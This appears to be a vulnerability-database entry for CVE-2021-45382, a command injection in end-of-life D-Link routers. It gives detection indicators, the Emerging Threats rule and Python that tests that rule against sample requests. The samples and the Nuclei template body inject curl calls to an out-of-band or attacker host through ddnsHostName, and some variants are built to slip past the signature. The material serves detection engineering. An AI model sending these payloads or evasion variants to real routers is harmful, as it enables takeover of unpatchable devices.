CVE-2021-45382
published 2022-02-17


Priority P193 · critical 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW (in the wild), EXPLOIT
CISA Known Exploited Vulnerability, due 2022-04-25
Exploited in the wild
EPSS: 97.84% (99.9th percentile)
A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file. Note: DIR-810L, DIR-820L, DIR-830L, DIR-826L, DIR-836L, all hardware revisions, have reached their End of Life ("EOL") /End of Service Life ("EOS") Life-Cycle and as such this issue will not be patched.

Detection & IOCs (extracted from sources)

URL: /ddns_check.ccp
Command (Nuclei template body, placeholders as in the template): ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}
Filename: ncc2
IDS rule (Emerging Threats, Suricata sticky-buffer syntax):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT D-Link - RCE Attempt Inbound (CVE-2021-45382)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/ddns_check.ccp"; fast_pattern; http.request_body; content:"&ddnsHostName="; pcre:"/^(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:cve,2021-45382; classtype:attempted-admin; sid:2035747; rev:2; metadata:attack_target Networking_Equipment, created_at 2022_04_05, cve CVE_2021_45382, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, updated_at 2024_03_08;)
  • The exploit is an HTTP POST to /ddns_check.ccp. The ET rule keys on the raw request body containing "&ddnsHostName=" immediately followed by a shell metacharacter (;, newline, &, backtick, |, $); the pcre is anchored with /R to the end of that content match, so only a metacharacter in the first byte of the value fires the rule.
  • The Nuclei template confirms exploitation with an out-of-band HTTP callback (interactsh): the injected command is a curl to the attacker's host. Outbound HTTP requests from a D-Link router's IP to unexpected external hosts are a post-exploitation indicator.
  • The vulnerability is unauthenticated and reachable over the network (CVSS AV:N/AC:L/PR:N); no separate authentication bypass is needed, so any POST to /ddns_check.ccp with an injected ddnsHostName is a direct exploitation attempt.
  • The ET rule (SID 2035747) is tagged CISA_KEV and classified attempted-admin; its metadata lists both Perimeter and Internal deployment, so deploy it on both segments for full coverage.
  • All affected D-Link models (DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, DIR-836L) are End-of-Life/End-of-Service and will not be patched; detection and isolation are the only options short of replacing the device.
  • CISA's KEV guidance for end-of-life products is to disconnect the device if it is still in use; a passive detection rule alone is insufficient, so use asset inventory to find and isolate these routers.
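As an added example (not code from this page, from Emerging Threats or from D-Link), the Python below re-implements the matching conditions of ET SID 2035747 next to a check that decodes the form body and inspects the whole ddnsHostName value, and runs both over constructed requests. It makes the rule's coverage concrete: because the pcre is anchored with /R to the end of the "&ddnsHostName=" content match, a metacharacter that is not the first byte of the value, a percent-encoded metacharacter, or ddnsHostName sent as the first parameter (no leading &) does not fire the rule. Whether the device would execute those variants is not established by this page; the point is what the signature does and does not see. The helper names, the host oob.attacker.example and the sample bodies are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

# Hypothetical helper approximating the content/pcre chain of ET SID 2035747:
# POST, URI containing /ddns_check.ccp, and the raw request body containing
# "&ddnsHostName=" immediately followed by ; \n & ` | or $ (the /R anchor).
ET_BODY_PATTERN = re.compile(rb"&ddnsHostName=[\x3b\x0a\x26\x60\x7c\x24]")


def et_rule_matches(method: str, uri: str, body: bytes) -> bool:
    """Return True where every content match of the ET rule would succeed."""
    if method != "POST" or "/ddns_check.ccp" not in uri:
        return False
    return ET_BODY_PATTERN.search(body) is not None


def parse_form_body(body: bytes) -> Dict[str, List[str]]:
    """Minimal application/x-www-form-urlencoded parser: splits on & only and
    percent/plus-decodes keys and values, so results do not depend on the
    separator behaviour of urllib.parse.parse_qs across Python versions."""
    params: Dict[str, List[str]] = {}
    for pair in body.split(b"&"):
        if not pair:
            continue
        key, _, value = pair.partition(b"=")
        k = unquote_plus(key.decode("latin-1"))
        v = unquote_plus(value.decode("latin-1"))
        params.setdefault(k, []).append(v)
    return params


SHELL_METACHARS = set(";\n&`|$")


def ddns_hostname_injection(method: str, uri: str, body: bytes) -> bool:
    """Broader check: flag a shell metacharacter anywhere in the decoded
    ddnsHostName value, regardless of parameter order or percent-encoding."""
    if method != "POST" or "/ddns_check.ccp" not in uri:
        return False
    for value in parse_form_body(body).get("ddnsHostName", []):
        if any(ch in SHELL_METACHARS for ch in value):
            return True
    return False


# Constructed sample requests (not captured traffic). The first mirrors the
# Nuclei payload on this page with its placeholders filled in; the rest are
# variants chosen to show where the ET rule's anchoring stops matching.
URI = "/ddns_check.ccp"
SAMPLES: List[Tuple[str, str, str, bytes]] = [
    ("nuclei_payload", "POST", URI,
     b"ccp_act=doCheck&ddnsHostName=;curl https://oob.attacker.example;"
     b"&ddnsUsername=u&ddnsPassword=p"),
    ("metachar_not_first_byte", "POST", URI,
     b"ccp_act=doCheck&ddnsHostName=host.example.com;curl http://oob.attacker.example"
     b"&ddnsUsername=u&ddnsPassword=p"),
    ("percent_encoded", "POST", URI,
     b"ccp_act=doCheck&ddnsHostName=%3Bcurl+http://oob.attacker.example%3B"
     b"&ddnsUsername=u&ddnsPassword=p"),
    ("hostname_is_first_param", "POST", URI,
     b"ddnsHostName=;curl http://oob.attacker.example&ccp_act=doCheck"
     b"&ddnsUsername=u&ddnsPassword=p"),
    ("benign_check", "POST", URI,
     b"ccp_act=doCheck&ddnsHostName=myhost.dyndns.example"
     b"&ddnsUsername=u&ddnsPassword=p"),
]


def classify_samples() -> Dict[str, Tuple[bool, bool]]:
    """Map sample name -> (ET rule fires, decoded-value check fires)."""
    return {
        name: (et_rule_matches(m, u, b), ddns_hostname_injection(m, u, b))
        for name, m, u, b in SAMPLES
    }


if __name__ == "__main__":
    for name, (et, broad) in classify_samples().items():
        print(f"{name:26s} ET-2035747={et!s:5s} decoded-check={broad}")
```

Only the first sample fires the ET rule; the next three fire only the decoded-value check, and the benign DDNS check fires neither. If the broader logic is turned into a production rule, keep the URI and method gating so that ordinary DDNS configuration traffic on other endpoints is not flagged.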

CVSS provenance

source     version  score  severity  vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     10.0   CRITICAL  AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck           9.8    CRITICAL
cisa                9.8    CRITICAL